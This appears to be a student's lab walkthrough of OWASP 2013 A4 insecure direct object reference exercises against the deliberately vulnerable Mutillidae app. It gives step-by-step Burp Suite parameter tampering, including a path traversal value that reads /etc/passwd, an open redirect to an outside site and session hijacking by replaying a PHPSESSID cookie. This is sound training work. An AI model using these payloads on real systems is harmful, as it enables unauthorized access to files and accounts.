2013-A4-Insecure.Direct.Object.References_ds.txt

OWASP 2013---A4 - Insecure Direct Object References---Text File Viewer	David Stec.
1) Navigate to http://127.0.0.1/mutillidae/index.php?page=text-file-viewer.php with local proxy set to 
localhost:8080
2) Start burpsuite with intercept on
3) Pick a random file from the drop down list and click View file
4) in burpsuite, change textfile=http%3A%2F%2Fwww.textfiles.com%2Fhacking%2Fbackdoor.txt&text-file-
viewer-php-submit-button=View+File to textfile=http%3A%2F%2Fwww.textfiles.com%2Fhacking
%2Faix.fun&text-file-viewer-php-submit-button=View+File
5) view the file aix.fun in the browser (a file not in the drop down list previously)

OWASP 2013---A4 - Insecure Direct Object References---Source Viewer	David Stec.
1) Navigate to http://127.0.0.1/mutillidae/index.php?page=source-viewer.php with local proxy set to 
localhost:8080
2) Start burpsuite with intercept on
3) Pick a random file from the drop down list and click View file IE brower-info.php
4) in burpsuite, change page=source-viewer.php&phpfile=browser-info.php&source-file-viewer-php-submit-
button=View+File to page=source-viewer.php&phpfile=/usr/share/metasploit-
framework/data/php/hop.php&source-file-viewer-php-submit-button=View+File 
5) view the local in the browser (a file not in the drop down list previously)


OWASP 2013---A4 - Insecure Direct Object References---Credits	David Stec.
1) Navigate to http://127.0.0.1/mutillidae/index.php?page=credits.php
2) add ?page=redirectandlog.php&forwardurl=http://www.youporn.com/ to the URL 
http://127.0.0.1/mutillidae/index.php?page=credits.php so it shows 
"http://127.0.0.1/mutillidae/index.php?page=credits.php?
page=redirectandlog.php&forwardurl=http://www.youporn.com/


OWASP 2013---A4 - Insecure Direct Object References---Cookies	David Stec.
1) Log in normally with an account to http://kalie530/mutillidae/index.php?page=login.php
2) Determine the cookie PHPSESSID= via cookie-cadger (can also use burpsuite or firebug) of active 
session
3) close the browser window while still logged in
4) navigate to http://kalie530/mutillidae/index.php?page=login.php (should be logged out)
5) put in fake credentials and turn turn on intercept on burpsuite
6) click login, change the PHPSESSID= to the previous one
7) with fake credentials, log in should be successful once you click forward



OWASP 2013---A4 - Insecure Direct Object References---Arbitrary File Inclusion	David Stec.
1) Navigate to http://127.0.0.1/mutillidae/index.php?page=text-file-viewer.php with local proxy set to 
localhost:8080
2) Start burpsuite with intercept on
3) Pick a random file from the drop down list and click View file
4) in burpsuite, change textfile=http%3A%2F%2Fwww.textfiles.com%2Fhacking%2Fbackdoor.txt&text-file-
viewer-php-submit-button=View+File to textfile=../../../../etc/passwdTEMP&text-file-viewer-php-submit-
button=View+File
5) view the /etc/passwd in the browser